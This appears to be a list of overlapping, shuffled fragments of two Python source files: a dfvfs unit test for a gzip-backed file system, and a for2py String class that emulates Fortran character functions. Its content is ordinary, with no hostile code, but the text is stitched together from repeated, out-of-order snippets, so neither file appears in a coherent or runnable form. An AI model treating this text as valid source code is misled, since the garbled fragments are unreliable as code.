by path specification functionality.\"\"\" file_system = gzip_file_system.GzipFileSystem(self._resolver_context)", "\"\"\"Sets up the needed objects used throughout the test.\"\"\" self._resolver_context = context.Context() test_file", "the get root file entry functionality.\"\"\" file_system = gzip_file_system.GzipFileSystem(self._resolver_context) self.assertNotEqual(file_system, None) file_system.Open(path_spec=self._gzip_path_spec) file_entry", "def testGetRootFileEntry(self): \"\"\"Test the get root file entry functionality.\"\"\" file_system = gzip_file_system.GzipFileSystem(self._resolver_context) self.assertNotEqual(file_system,", "needed objects used throughout the test.\"\"\" self._resolver_context = context.Context() test_file = os.path.join(u'test_data', u'syslog.gz')", "-*- coding: utf-8 -*- \"\"\"Tests for the file system implementation using gzip.\"\"\" import", "self._resolver_context = context.Context() test_file = os.path.join(u'test_data', u'syslog.gz') path_spec = os_path_spec.OSPathSpec(location=test_file) self._gzip_path_spec = gzip_path_spec.GzipPathSpec(parent=path_spec)", "file_entry = file_system.GetRootFileEntry() self.assertNotEqual(file_entry, None) self.assertEqual(file_entry.name, u'') file_system.Close() if __name__ == '__main__': unittest.main()", "GzipFileSystemTest(unittest.TestCase): \"\"\"The unit test for the gzip file system object.\"\"\" def setUp(self): \"\"\"Sets", "= context.Context() test_file = os.path.join(u'test_data', u'syslog.gz') path_spec = os_path_spec.OSPathSpec(location=test_file) self._gzip_path_spec = gzip_path_spec.GzipPathSpec(parent=path_spec) def", "entry exists by path specification functionality.\"\"\" file_system = gzip_file_system.GzipFileSystem(self._resolver_context) self.assertNotEqual(file_system, None) file_system.Open(path_spec=self._gzip_path_spec) self.assertTrue(file_system.FileEntryExistsByPathSpec(self._gzip_path_spec))", "= gzip_file_system.GzipFileSystem(self._resolver_context) self.assertNotEqual(file_system, None) file_system.Open(path_spec=self._gzip_path_spec) file_entry = file_system.GetFileEntryByPathSpec(self._gzip_path_spec) self.assertNotEqual(file_entry, None) self.assertEqual(file_entry.name, u'') file_system.Close()", "= gzip_file_system.GzipFileSystem(self._resolver_context) self.assertNotEqual(file_system, None) file_system.Open(path_spec=self._gzip_path_spec) file_system.Close() def testFileEntryExistsByPathSpec(self): \"\"\"Test the file entry exists", "= gzip_file_system.GzipFileSystem(self._resolver_context) self.assertNotEqual(file_system, None) file_system.Open(path_spec=self._gzip_path_spec) file_entry = file_system.GetRootFileEntry() self.assertNotEqual(file_entry, None) self.assertEqual(file_entry.name, u'') file_system.Close()", "objects used throughout the test.\"\"\" self._resolver_context = context.Context() test_file = os.path.join(u'test_data', u'syslog.gz') path_spec", "the get entry by path specification functionality.\"\"\" file_system = gzip_file_system.GzipFileSystem(self._resolver_context) self.assertNotEqual(file_system, None) file_system.Open(path_spec=self._gzip_path_spec)", "= os_path_spec.OSPathSpec(location=test_file) self._gzip_path_spec = gzip_path_spec.GzipPathSpec(parent=path_spec) def testOpenAndClose(self): \"\"\"Test the open and close functionality.\"\"\"", "= gzip_file_system.GzipFileSystem(self._resolver_context) self.assertNotEqual(file_system, None) file_system.Open(path_spec=self._gzip_path_spec) self.assertTrue(file_system.FileEntryExistsByPathSpec(self._gzip_path_spec)) file_system.Close() def testGetFileEntryByPathSpec(self): \"\"\"Test the get entry", "self.assertNotEqual(file_system, None) file_system.Open(path_spec=self._gzip_path_spec) file_system.Close() def testFileEntryExistsByPathSpec(self): \"\"\"Test the file entry exists by path", "using gzip.\"\"\" import os import unittest from dfvfs.path import gzip_path_spec from dfvfs.path import", "self._gzip_path_spec = gzip_path_spec.GzipPathSpec(parent=path_spec) def testOpenAndClose(self): \"\"\"Test the open and close functionality.\"\"\" file_system =", "self.assertEqual(file_entry.name, u'') file_system.Close() def testGetRootFileEntry(self): \"\"\"Test the get root file entry functionality.\"\"\" file_system", "None) file_system.Open(path_spec=self._gzip_path_spec) file_entry = file_system.GetFileEntryByPathSpec(self._gzip_path_spec) self.assertNotEqual(file_entry, None) self.assertEqual(file_entry.name, u'') file_system.Close() def testGetRootFileEntry(self): \"\"\"Test", "the open and close functionality.\"\"\" file_system = gzip_file_system.GzipFileSystem(self._resolver_context) self.assertNotEqual(file_system, None) file_system.Open(path_spec=self._gzip_path_spec) file_system.Close() def", "test for the gzip file system object.\"\"\" def setUp(self): \"\"\"Sets up the needed", "file_system = gzip_file_system.GzipFileSystem(self._resolver_context) self.assertNotEqual(file_system, None) file_system.Open(path_spec=self._gzip_path_spec) file_entry = file_system.GetRootFileEntry() self.assertNotEqual(file_entry, None) self.assertEqual(file_entry.name, u'')", "for the gzip file system object.\"\"\" def setUp(self): \"\"\"Sets up the needed objects", "file entry functionality.\"\"\" file_system = gzip_file_system.GzipFileSystem(self._resolver_context) self.assertNotEqual(file_system, None) file_system.Open(path_spec=self._gzip_path_spec) file_entry = file_system.GetRootFileEntry() self.assertNotEqual(file_entry,", "close functionality.\"\"\" file_system = gzip_file_system.GzipFileSystem(self._resolver_context) self.assertNotEqual(file_system, None) file_system.Open(path_spec=self._gzip_path_spec) file_system.Close() def testFileEntryExistsByPathSpec(self): \"\"\"Test the", "functionality.\"\"\" file_system = gzip_file_system.GzipFileSystem(self._resolver_context) self.assertNotEqual(file_system, None) file_system.Open(path_spec=self._gzip_path_spec) file_system.Close() def testFileEntryExistsByPathSpec(self): \"\"\"Test the file", "gzip_file_system.GzipFileSystem(self._resolver_context) self.assertNotEqual(file_system, None) file_system.Open(path_spec=self._gzip_path_spec) file_entry = file_system.GetFileEntryByPathSpec(self._gzip_path_spec) self.assertNotEqual(file_entry, None) self.assertEqual(file_entry.name, u'') file_system.Close() def", "file_system.Open(path_spec=self._gzip_path_spec) self.assertTrue(file_system.FileEntryExistsByPathSpec(self._gzip_path_spec)) file_system.Close() def testGetFileEntryByPathSpec(self): \"\"\"Test the get entry by path specification functionality.\"\"\"", "self.assertNotEqual(file_system, None) file_system.Open(path_spec=self._gzip_path_spec) file_entry = file_system.GetRootFileEntry() self.assertNotEqual(file_entry, None) self.assertEqual(file_entry.name, u'') file_system.Close() if __name__", "the gzip file system object.\"\"\" def setUp(self): \"\"\"Sets up the needed objects used", "from dfvfs.path import os_path_spec from dfvfs.resolver import context from dfvfs.vfs import gzip_file_system class", "self.assertTrue(file_system.FileEntryExistsByPathSpec(self._gzip_path_spec)) file_system.Close() def testGetFileEntryByPathSpec(self): \"\"\"Test the get entry by path specification functionality.\"\"\" file_system", "and close functionality.\"\"\" file_system = gzip_file_system.GzipFileSystem(self._resolver_context) self.assertNotEqual(file_system, None) file_system.Open(path_spec=self._gzip_path_spec) file_system.Close() def testFileEntryExistsByPathSpec(self): \"\"\"Test", "# -*- coding: utf-8 -*- \"\"\"Tests for the file system implementation using gzip.\"\"\"", "testOpenAndClose(self): \"\"\"Test the open and close functionality.\"\"\" file_system = gzip_file_system.GzipFileSystem(self._resolver_context) self.assertNotEqual(file_system, None) file_system.Open(path_spec=self._gzip_path_spec)", "file_system.Open(path_spec=self._gzip_path_spec) file_entry = file_system.GetFileEntryByPathSpec(self._gzip_path_spec) self.assertNotEqual(file_entry, None) self.assertEqual(file_entry.name, u'') file_system.Close() def testGetRootFileEntry(self): \"\"\"Test the", "file_system = gzip_file_system.GzipFileSystem(self._resolver_context) self.assertNotEqual(file_system, None) file_system.Open(path_spec=self._gzip_path_spec) self.assertTrue(file_system.FileEntryExistsByPathSpec(self._gzip_path_spec)) file_system.Close() def testGetFileEntryByPathSpec(self): \"\"\"Test the get", "from dfvfs.path import gzip_path_spec from dfvfs.path import os_path_spec from dfvfs.resolver import context from", "from dfvfs.resolver import context from dfvfs.vfs import gzip_file_system class GzipFileSystemTest(unittest.TestCase): \"\"\"The unit test", "get entry by path specification functionality.\"\"\" file_system = gzip_file_system.GzipFileSystem(self._resolver_context) self.assertNotEqual(file_system, None) file_system.Open(path_spec=self._gzip_path_spec) file_entry", "specification functionality.\"\"\" file_system = gzip_file_system.GzipFileSystem(self._resolver_context) self.assertNotEqual(file_system, None) file_system.Open(path_spec=self._gzip_path_spec) self.assertTrue(file_system.FileEntryExistsByPathSpec(self._gzip_path_spec)) file_system.Close() def testGetFileEntryByPathSpec(self): \"\"\"Test", "file_system.Open(path_spec=self._gzip_path_spec) file_system.Close() def testFileEntryExistsByPathSpec(self): \"\"\"Test the file entry exists by path specification functionality.\"\"\"", "\"\"\"Tests for the file system implementation using gzip.\"\"\" import os import unittest from", "gzip_path_spec.GzipPathSpec(parent=path_spec) def testOpenAndClose(self): \"\"\"Test the open and close functionality.\"\"\" file_system = gzip_file_system.GzipFileSystem(self._resolver_context) self.assertNotEqual(file_system,", "u'syslog.gz') path_spec = os_path_spec.OSPathSpec(location=test_file) self._gzip_path_spec = gzip_path_spec.GzipPathSpec(parent=path_spec) def testOpenAndClose(self): \"\"\"Test the open and", "= gzip_path_spec.GzipPathSpec(parent=path_spec) def testOpenAndClose(self): \"\"\"Test the open and close functionality.\"\"\" file_system = gzip_file_system.GzipFileSystem(self._resolver_context)", "def setUp(self): \"\"\"Sets up the needed objects used throughout the test.\"\"\" self._resolver_context =", "class GzipFileSystemTest(unittest.TestCase): \"\"\"The unit test for the gzip file system object.\"\"\" def setUp(self):", "entry functionality.\"\"\" file_system = gzip_file_system.GzipFileSystem(self._resolver_context) self.assertNotEqual(file_system, None) file_system.Open(path_spec=self._gzip_path_spec) file_entry = file_system.GetRootFileEntry() self.assertNotEqual(file_entry, None)", "functionality.\"\"\" file_system = gzip_file_system.GzipFileSystem(self._resolver_context) self.assertNotEqual(file_system, None) file_system.Open(path_spec=self._gzip_path_spec) file_entry = file_system.GetRootFileEntry() self.assertNotEqual(file_entry, None) self.assertEqual(file_entry.name,", "up the needed objects used throughout the test.\"\"\" self._resolver_context = context.Context() test_file =", "\"\"\"Test the get entry by path specification functionality.\"\"\" file_system = gzip_file_system.GzipFileSystem(self._resolver_context) self.assertNotEqual(file_system, None)", "-*- \"\"\"Tests for the file system implementation using gzip.\"\"\" import os import unittest", "path specification functionality.\"\"\" file_system = gzip_file_system.GzipFileSystem(self._resolver_context) self.assertNotEqual(file_system, None) file_system.Open(path_spec=self._gzip_path_spec) self.assertTrue(file_system.FileEntryExistsByPathSpec(self._gzip_path_spec)) file_system.Close() def testGetFileEntryByPathSpec(self):", "the test.\"\"\" self._resolver_context = context.Context() test_file = os.path.join(u'test_data', u'syslog.gz') path_spec = os_path_spec.OSPathSpec(location=test_file) self._gzip_path_spec", "gzip_file_system.GzipFileSystem(self._resolver_context) self.assertNotEqual(file_system, None) file_system.Open(path_spec=self._gzip_path_spec) file_entry = file_system.GetRootFileEntry() self.assertNotEqual(file_entry, None) self.assertEqual(file_entry.name, u'') file_system.Close() if", "u'') file_system.Close() def testGetRootFileEntry(self): \"\"\"Test the get root file entry functionality.\"\"\" file_system =", "file_system.Close() def testGetFileEntryByPathSpec(self): \"\"\"Test the get entry by path specification functionality.\"\"\" file_system =", "system implementation using gzip.\"\"\" import os import unittest from dfvfs.path import gzip_path_spec from", "import os_path_spec from dfvfs.resolver import context from dfvfs.vfs import gzip_file_system class GzipFileSystemTest(unittest.TestCase): \"\"\"The", "self.assertNotEqual(file_entry, None) self.assertEqual(file_entry.name, u'') file_system.Close() def testGetRootFileEntry(self): \"\"\"Test the get root file entry", "context from dfvfs.vfs import gzip_file_system class GzipFileSystemTest(unittest.TestCase): \"\"\"The unit test for the gzip", "= file_system.GetFileEntryByPathSpec(self._gzip_path_spec) self.assertNotEqual(file_entry, None) self.assertEqual(file_entry.name, u'') file_system.Close() def testGetRootFileEntry(self): \"\"\"Test the get root", "setUp(self): \"\"\"Sets up the needed objects used throughout the test.\"\"\" self._resolver_context = context.Context()", "test_file = os.path.join(u'test_data', u'syslog.gz') path_spec = os_path_spec.OSPathSpec(location=test_file) self._gzip_path_spec = gzip_path_spec.GzipPathSpec(parent=path_spec) def testOpenAndClose(self): \"\"\"Test", "path_spec = os_path_spec.OSPathSpec(location=test_file) self._gzip_path_spec = gzip_path_spec.GzipPathSpec(parent=path_spec) def testOpenAndClose(self): \"\"\"Test the open and close", "exists by path specification functionality.\"\"\" file_system = gzip_file_system.GzipFileSystem(self._resolver_context) self.assertNotEqual(file_system, None) file_system.Open(path_spec=self._gzip_path_spec) self.assertTrue(file_system.FileEntryExistsByPathSpec(self._gzip_path_spec)) file_system.Close()", "specification functionality.\"\"\" file_system = gzip_file_system.GzipFileSystem(self._resolver_context) self.assertNotEqual(file_system, None) file_system.Open(path_spec=self._gzip_path_spec) file_entry = file_system.GetFileEntryByPathSpec(self._gzip_path_spec) self.assertNotEqual(file_entry, None)", "\"\"\"Test the open and close functionality.\"\"\" file_system = gzip_file_system.GzipFileSystem(self._resolver_context) self.assertNotEqual(file_system, None) file_system.Open(path_spec=self._gzip_path_spec) file_system.Close()", "file_system = gzip_file_system.GzipFileSystem(self._resolver_context) self.assertNotEqual(file_system, None) file_system.Open(path_spec=self._gzip_path_spec) file_entry = file_system.GetFileEntryByPathSpec(self._gzip_path_spec) self.assertNotEqual(file_entry, None) self.assertEqual(file_entry.name, u'')", "from dfvfs.vfs import gzip_file_system class GzipFileSystemTest(unittest.TestCase): \"\"\"The unit test for the gzip file", "entry by path specification functionality.\"\"\" file_system = gzip_file_system.GzipFileSystem(self._resolver_context) self.assertNotEqual(file_system, None) file_system.Open(path_spec=self._gzip_path_spec) file_entry =", "file_entry = file_system.GetFileEntryByPathSpec(self._gzip_path_spec) self.assertNotEqual(file_entry, None) self.assertEqual(file_entry.name, u'') file_system.Close() def testGetRootFileEntry(self): \"\"\"Test the get", "import unittest from dfvfs.path import gzip_path_spec from dfvfs.path import os_path_spec from dfvfs.resolver import", "by path specification functionality.\"\"\" file_system = gzip_file_system.GzipFileSystem(self._resolver_context) self.assertNotEqual(file_system, None) file_system.Open(path_spec=self._gzip_path_spec) file_entry = file_system.GetFileEntryByPathSpec(self._gzip_path_spec)", "functionality.\"\"\" file_system = gzip_file_system.GzipFileSystem(self._resolver_context) self.assertNotEqual(file_system, None) file_system.Open(path_spec=self._gzip_path_spec) file_entry = file_system.GetFileEntryByPathSpec(self._gzip_path_spec) self.assertNotEqual(file_entry, None) self.assertEqual(file_entry.name,", "dfvfs.resolver import context from dfvfs.vfs import gzip_file_system class GzipFileSystemTest(unittest.TestCase): \"\"\"The unit test for", "file system implementation using gzip.\"\"\" import os import unittest from dfvfs.path import gzip_path_spec", "#!/usr/bin/python # -*- coding: utf-8 -*- \"\"\"Tests for the file system implementation using", "dfvfs.vfs import gzip_file_system class GzipFileSystemTest(unittest.TestCase): \"\"\"The unit test for the gzip file system", "gzip_file_system class GzipFileSystemTest(unittest.TestCase): \"\"\"The unit test for the gzip file system object.\"\"\" def", "coding: utf-8 -*- \"\"\"Tests for the file system implementation using gzip.\"\"\" import os", "unittest from dfvfs.path import gzip_path_spec from dfvfs.path import os_path_spec from dfvfs.resolver import context", "unit test for the gzip file system object.\"\"\" def setUp(self): \"\"\"Sets up the", "utf-8 -*- \"\"\"Tests for the file system implementation using gzip.\"\"\" import os import", "import gzip_path_spec from dfvfs.path import os_path_spec from dfvfs.resolver import context from dfvfs.vfs import", "file entry exists by path specification functionality.\"\"\" file_system = gzip_file_system.GzipFileSystem(self._resolver_context) self.assertNotEqual(file_system, None) file_system.Open(path_spec=self._gzip_path_spec)", "open and close functionality.\"\"\" file_system = gzip_file_system.GzipFileSystem(self._resolver_context) self.assertNotEqual(file_system, None) file_system.Open(path_spec=self._gzip_path_spec) file_system.Close() def testFileEntryExistsByPathSpec(self):", "\"\"\"Test the get root file entry functionality.\"\"\" file_system = gzip_file_system.GzipFileSystem(self._resolver_context) self.assertNotEqual(file_system, None) file_system.Open(path_spec=self._gzip_path_spec)", "path specification functionality.\"\"\" file_system = gzip_file_system.GzipFileSystem(self._resolver_context) self.assertNotEqual(file_system, None) file_system.Open(path_spec=self._gzip_path_spec) file_entry = file_system.GetFileEntryByPathSpec(self._gzip_path_spec) self.assertNotEqual(file_entry,", "\"\"\"The unit test for the gzip file system object.\"\"\" def setUp(self): \"\"\"Sets up", "None) file_system.Open(path_spec=self._gzip_path_spec) self.assertTrue(file_system.FileEntryExistsByPathSpec(self._gzip_path_spec)) file_system.Close() def testGetFileEntryByPathSpec(self): \"\"\"Test the get entry by path specification", "gzip.\"\"\" import os import unittest from dfvfs.path import gzip_path_spec from dfvfs.path import os_path_spec", "the file system implementation using gzip.\"\"\" import os import unittest from dfvfs.path import", "= os.path.join(u'test_data', u'syslog.gz') path_spec = os_path_spec.OSPathSpec(location=test_file) self._gzip_path_spec = gzip_path_spec.GzipPathSpec(parent=path_spec) def testOpenAndClose(self): \"\"\"Test the", "None) self.assertEqual(file_entry.name, u'') file_system.Close() def testGetRootFileEntry(self): \"\"\"Test the get root file entry functionality.\"\"\"" ]
[ "file: for word in line.split(): words.append(word.lower()) for element in words: if element in", "in words: if element in keywords: if element in sol: sol[element] += 1", "= [] sol = dict() with open(path) as file: for line in file:", "in sol: sol[element] += 1 else: sol[element] = 1 else: continue return sol", "sol[element] += 1 else: sol[element] = 1 else: continue return sol print(count_keywords(\"/Users/merterol/Desktop/uzhpython/uzh/Informatik1/MidtermsInfk/midterms hs19/text.txt\",", "else: sol[element] = 1 else: continue return sol print(count_keywords(\"/Users/merterol/Desktop/uzhpython/uzh/Informatik1/MidtermsInfk/midterms hs19/text.txt\", [\"forest\", \"the\", \"found\"]))", "count_keywords(path, keywords): words = [] sol = dict() with open(path) as file: for", "sol = dict() with open(path) as file: for line in file: for word", "element in sol: sol[element] += 1 else: sol[element] = 1 else: continue return", "keywords: if element in sol: sol[element] += 1 else: sol[element] = 1 else:", "sol: sol[element] += 1 else: sol[element] = 1 else: continue return sol print(count_keywords(\"/Users/merterol/Desktop/uzhpython/uzh/Informatik1/MidtermsInfk/midterms", "keywords): words = [] sol = dict() with open(path) as file: for line", "element in words: if element in keywords: if element in sol: sol[element] +=", "element in keywords: if element in sol: sol[element] += 1 else: sol[element] =", "Prep/midterms hs19/count_keywords.py def count_keywords(path, keywords): words = [] sol = dict() with open(path)", "<reponame>Queentaker/uzh<filename>Informatik1/Midterms Prep/midterms hs19/count_keywords.py def count_keywords(path, keywords): words = [] sol = dict() with", "words.append(word.lower()) for element in words: if element in keywords: if element in sol:", "with open(path) as file: for line in file: for word in line.split(): words.append(word.lower())", "continue return sol print(count_keywords(\"/Users/merterol/Desktop/uzhpython/uzh/Informatik1/MidtermsInfk/midterms hs19/text.txt\", [\"forest\", \"the\", \"found\"])) print(count_keywords(\"/Users/merterol/Desktop/uzhpython/uzh/Informatik1/MidtermsInfk/midterms hs19/text.txt\", [\"black\"])) print(count_keywords(\"/Users/merterol/Desktop/uzhpython/uzh/Informatik1/MidtermsInfk/midterms hs19/text.txt\",", "open(path) as file: for line in file: for word in line.split(): words.append(word.lower()) for", "line.split(): words.append(word.lower()) for element in words: if element in keywords: if element in", "if element in keywords: if element in sol: sol[element] += 1 else: sol[element]", "= 1 else: continue return sol print(count_keywords(\"/Users/merterol/Desktop/uzhpython/uzh/Informatik1/MidtermsInfk/midterms hs19/text.txt\", [\"forest\", \"the\", \"found\"])) print(count_keywords(\"/Users/merterol/Desktop/uzhpython/uzh/Informatik1/MidtermsInfk/midterms hs19/text.txt\",", "word in line.split(): words.append(word.lower()) for element in words: if element in keywords: if", "dict() with open(path) as file: for line in file: for word in line.split():", "for line in file: for word in line.split(): words.append(word.lower()) for element in words:", "= dict() with open(path) as file: for line in file: for word in", "for word in line.split(): words.append(word.lower()) for element in words: if element in keywords:", "sol[element] = 1 else: continue return sol print(count_keywords(\"/Users/merterol/Desktop/uzhpython/uzh/Informatik1/MidtermsInfk/midterms hs19/text.txt\", [\"forest\", \"the\", \"found\"])) print(count_keywords(\"/Users/merterol/Desktop/uzhpython/uzh/Informatik1/MidtermsInfk/midterms", "words: if element in keywords: if element in sol: sol[element] += 1 else:", "1 else: continue return sol print(count_keywords(\"/Users/merterol/Desktop/uzhpython/uzh/Informatik1/MidtermsInfk/midterms hs19/text.txt\", [\"forest\", \"the\", \"found\"])) print(count_keywords(\"/Users/merterol/Desktop/uzhpython/uzh/Informatik1/MidtermsInfk/midterms hs19/text.txt\", [\"black\"]))", "for element in words: if element in keywords: if element in sol: sol[element]", "def count_keywords(path, keywords): words = [] sol = dict() with open(path) as file:", "else: continue return sol print(count_keywords(\"/Users/merterol/Desktop/uzhpython/uzh/Informatik1/MidtermsInfk/midterms hs19/text.txt\", [\"forest\", \"the\", \"found\"])) print(count_keywords(\"/Users/merterol/Desktop/uzhpython/uzh/Informatik1/MidtermsInfk/midterms hs19/text.txt\", [\"black\"])) print(count_keywords(\"/Users/merterol/Desktop/uzhpython/uzh/Informatik1/MidtermsInfk/midterms", "return sol print(count_keywords(\"/Users/merterol/Desktop/uzhpython/uzh/Informatik1/MidtermsInfk/midterms hs19/text.txt\", [\"forest\", \"the\", \"found\"])) print(count_keywords(\"/Users/merterol/Desktop/uzhpython/uzh/Informatik1/MidtermsInfk/midterms hs19/text.txt\", [\"black\"])) print(count_keywords(\"/Users/merterol/Desktop/uzhpython/uzh/Informatik1/MidtermsInfk/midterms hs19/text.txt\", []))", "in file: for word in line.split(): words.append(word.lower()) for element in words: if element", "line in file: for word in line.split(): words.append(word.lower()) for element in words: if", "if element in sol: sol[element] += 1 else: sol[element] = 1 else: continue", "hs19/count_keywords.py def count_keywords(path, keywords): words = [] sol = dict() with open(path) as", "words = [] sol = dict() with open(path) as file: for line in", "[] sol = dict() with open(path) as file: for line in file: for", "in keywords: if element in sol: sol[element] += 1 else: sol[element] = 1", "as file: for line in file: for word in line.split(): words.append(word.lower()) for element", "1 else: sol[element] = 1 else: continue return sol print(count_keywords(\"/Users/merterol/Desktop/uzhpython/uzh/Informatik1/MidtermsInfk/midterms hs19/text.txt\", [\"forest\", \"the\",", "file: for line in file: for word in line.split(): words.append(word.lower()) for element in", "+= 1 else: sol[element] = 1 else: continue return sol print(count_keywords(\"/Users/merterol/Desktop/uzhpython/uzh/Informatik1/MidtermsInfk/midterms hs19/text.txt\", [\"forest\",", "in line.split(): words.append(word.lower()) for element in words: if element in keywords: if element" ]
[ "def set_substr(self, i, j, other): # extract the substring substr = self.value(other)[:(j-i+1)] #", "trailing blanks and adds blanks on the left so that the result is", "string value newstr = self._val[:(i-1)] + substr + self._val[j:] # update self.set_(newstr) def", "other): \"\"\"String concatenation\"\"\" return self.value(other) + self._val def adjustl(self): \"\"\"adjustl() implements the ADJUSTL()", "1) and ending at position j.\"\"\" return self._val[(i-1):j] def set_substr(self, i, j, other):", "the input string.\"\"\" s = self._val.lstrip() pad_str = self.padding(len(s)) return s + pad_str", "strval): s = self.value(strval) n = len(s) if n < self._length: adjusted =", "self.padding(n) else: adjusted = s[:self._length] # truncate to self._length self._val = adjusted def", "\"\"\"adjustl() implements the ADJUSTL() function of Fortran. This function removes leading blanks and", "string.\"\"\" s = self._val.rstrip() pad_str = self.padding(len(s)) return pad_str + s def f_index(self,", "substr = self.value(other)[:(j-i+1)] # construct the new string value newstr = self._val[:(i-1)] +", "use the name f_index to emphasize that the behavior of Fortran's INDEX() is", "= self._val.rfind(substr) else: pos = self._val.find(substr) return pos + 1 def len_trim(self): return", "If the argument direction contains \"back\" the string is searched backwards starting from", "in the code generated by for2py. Usage: see the document \"for2py: Miscellaneous constructs\"", "f_index(self, substring, direction=[]): \"\"\"f_index() implements the string search function of Fortran's INDEX() function;", "!= length self.set_(value) def value(self, obj): if isinstance(obj, String): return obj._val else: return", "is slightly different from that of Python's index(). f_index() returns the position within", "\"\"\" class String: def __init__(self, length = 0, value = \"\"): if length", "value is assigned to self._val, it may need to be adjusted # if", "to emphasize that the behavior of Fortran's INDEX() is slightly different from that", "self.value(substring) if \"back\" in direction: pos = self._val.rfind(substr) else: pos = self._val.find(substr) return", "if n < self._length: # pad with blanks k = self._length - n", "result is the same length as the input string.\"\"\" s = self._val.rstrip() pad_str", "blanks k = self._length - n pad_str = \" \" * k else:", "ending at position j.\"\"\" return self._val[(i-1):j] def set_substr(self, i, j, other): # extract", "+ self.value(other) def __radd__(self, other): \"\"\"String concatenation\"\"\" return self.value(other) + self._val def adjustl(self):", "self._length = length else: self._length = len(value) # Before value is assigned to", "pad_str def adjustr(self): \"\"\"adjustr() implements the ADJUSTR() function of Fortran. This function removes", "isinstance(obj, String): return obj._val else: return obj def padding(self, n): \"\"\"padding() returns a", "implements the ADJUSTL() function of Fortran. This function removes leading blanks and adds", "is the same length as the input string.\"\"\" s = self._val.lstrip() pad_str =", "to the Fortran CHARACTER type) in the code generated by for2py. Usage: see", "occurrence. If the argument direction contains \"back\" the string is searched backwards starting", "the left so that the result is the same length as the input", "def repeat(self, n): return self._val * n def trim(self): return self._val.rstrip() def get_substr(self,", "__len__(self): return self._length def __add__(self, other): \"\"\"String concatenation\"\"\" return self._val + self.value(other) def", "n): return self._val * n def trim(self): return self._val.rstrip() def get_substr(self, i, j):", "that of Python's index(). f_index() returns the position within a string where substring", "This function removes trailing blanks and adds blanks on the left so that", "= self._val[:(i-1)] + substr + self._val[j:] # update self.set_(newstr) def __str__(self): return self._val", "self._val * n def trim(self): return self._val.rstrip() def get_substr(self, i, j): \"\"\"get_substr(i, j)", "return self.value(other) + self._val def adjustl(self): \"\"\"adjustl() implements the ADJUSTL() function of Fortran.", "is searched backwards starting from the end.\"\"\" substr = self.value(substring) if \"back\" in", "same length as the input string.\"\"\" s = self._val.rstrip() pad_str = self.padding(len(s)) return", "value newstr = self._val[:(i-1)] + substr + self._val[j:] # update self.set_(newstr) def __str__(self):", "len(s) if n < self._length: adjusted = s + self.padding(n) else: adjusted =", "adds blanks on the right so that the result is the same length", "set_substr(self, i, j, other): # extract the substring substr = self.value(other)[:(j-i+1)] # construct", "self.value(other) def __radd__(self, other): \"\"\"String concatenation\"\"\" return self.value(other) + self._val def adjustl(self): \"\"\"adjustl()", "else: return obj def padding(self, n): \"\"\"padding() returns a string of blanks of", "(start position = 1) and ending at position j.\"\"\" return self._val[(i-1):j] def set_substr(self,", "\"\"\"f_index() implements the string search function of Fortran's INDEX() function; we use the", "length else: self._length = len(value) # Before value is assigned to self._val, it", "Python's index(). f_index() returns the position within a string where substring first occurs;", "beginning at position i (start position = 1) and ending at position j.\"\"\"", "if len(value) != length self.set_(value) def value(self, obj): if isinstance(obj, String): return obj._val", "Fortran CHARACTER type) in the code generated by for2py. Usage: see the document", "the Fortran CHARACTER type) in the code generated by for2py. Usage: see the", "the right so that the result is the same length as the input", "self._val.rstrip() def get_substr(self, i, j): \"\"\"get_substr(i, j) returns the substring of the given", "\"\"\"get_substr(i, j) returns the substring of the given string beginning at position i", "if n < self._length: adjusted = s + self.padding(n) else: adjusted = s[:self._length]", "the code generated by for2py. Usage: see the document \"for2py: Miscellaneous constructs\" \"\"\"", "removes trailing blanks and adds blanks on the left so that the result", "blanks and adds blanks on the left so that the result is the", "n def trim(self): return self._val.rstrip() def get_substr(self, i, j): \"\"\"get_substr(i, j) returns the", "def adjustr(self): \"\"\"adjustr() implements the ADJUSTR() function of Fortran. This function removes trailing", "occurs; 0 if there is no such occurrence. If the argument direction contains", "left so that the result is the same length as the input string.\"\"\"", "string beginning at position i (start position = 1) and ending at position", "a string of blanks of length = sef._length - n.\"\"\" if n <", "\"\"\"String concatenation\"\"\" return self._val + self.value(other) def __radd__(self, other): \"\"\"String concatenation\"\"\" return self.value(other)", "adjusted # if len(value) != length self.set_(value) def value(self, obj): if isinstance(obj, String):", "truncate to self._length self._val = adjusted def __len__(self): return self._length def __add__(self, other):", "and ending at position j.\"\"\" return self._val[(i-1):j] def set_substr(self, i, j, other): #", "document \"for2py: Miscellaneous constructs\" \"\"\" class String: def __init__(self, length = 0, value", "there is no such occurrence. If the argument direction contains \"back\" the string", "* k else: pad_str = \"\" return pad_str def set_(self, strval): s =", "if isinstance(obj, String): return obj._val else: return obj def padding(self, n): \"\"\"padding() returns", "extract the substring substr = self.value(other)[:(j-i+1)] # construct the new string value newstr", "= self.padding(len(s)) return s + pad_str def adjustr(self): \"\"\"adjustr() implements the ADJUSTR() function", "i (start position = 1) and ending at position j.\"\"\" return self._val[(i-1):j] def", "String): return obj._val else: return obj def padding(self, n): \"\"\"padding() returns a string", "position j.\"\"\" return self._val[(i-1):j] def set_substr(self, i, j, other): # extract the substring", "sef._length - n.\"\"\" if n < self._length: # pad with blanks k =", "def get_substr(self, i, j): \"\"\"get_substr(i, j) returns the substring of the given string", "__add__(self, other): \"\"\"String concatenation\"\"\" return self._val + self.value(other) def __radd__(self, other): \"\"\"String concatenation\"\"\"", "return pad_str def set_(self, strval): s = self.value(strval) n = len(s) if n", "obj._val else: return obj def padding(self, n): \"\"\"padding() returns a string of blanks", "return s + pad_str def adjustr(self): \"\"\"adjustr() implements the ADJUSTR() function of Fortran.", "f_index to emphasize that the behavior of Fortran's INDEX() is slightly different from", "def len_trim(self): return len(self._val.rstrip()) def repeat(self, n): return self._val * n def trim(self):", "construct the new string value newstr = self._val[:(i-1)] + substr + self._val[j:] #", "the new string value newstr = self._val[:(i-1)] + substr + self._val[j:] # update", "pad_str = \" \" * k else: pad_str = \"\" return pad_str def", "if there is no such occurrence. If the argument direction contains \"back\" the", "input string.\"\"\" s = self._val.lstrip() pad_str = self.padding(len(s)) return s + pad_str def", "pad_str = \"\" return pad_str def set_(self, strval): s = self.value(strval) n =", "Fortran. This function removes leading blanks and adds blanks on the right so", "k else: pad_str = \"\" return pad_str def set_(self, strval): s = self.value(strval)", "# truncate to self._length self._val = adjusted def __len__(self): return self._length def __add__(self,", "def __len__(self): return self._length def __add__(self, other): \"\"\"String concatenation\"\"\" return self._val + self.value(other)", "= self._val.find(substr) return pos + 1 def len_trim(self): return len(self._val.rstrip()) def repeat(self, n):", "Miscellaneous constructs\" \"\"\" class String: def __init__(self, length = 0, value = \"\"):", 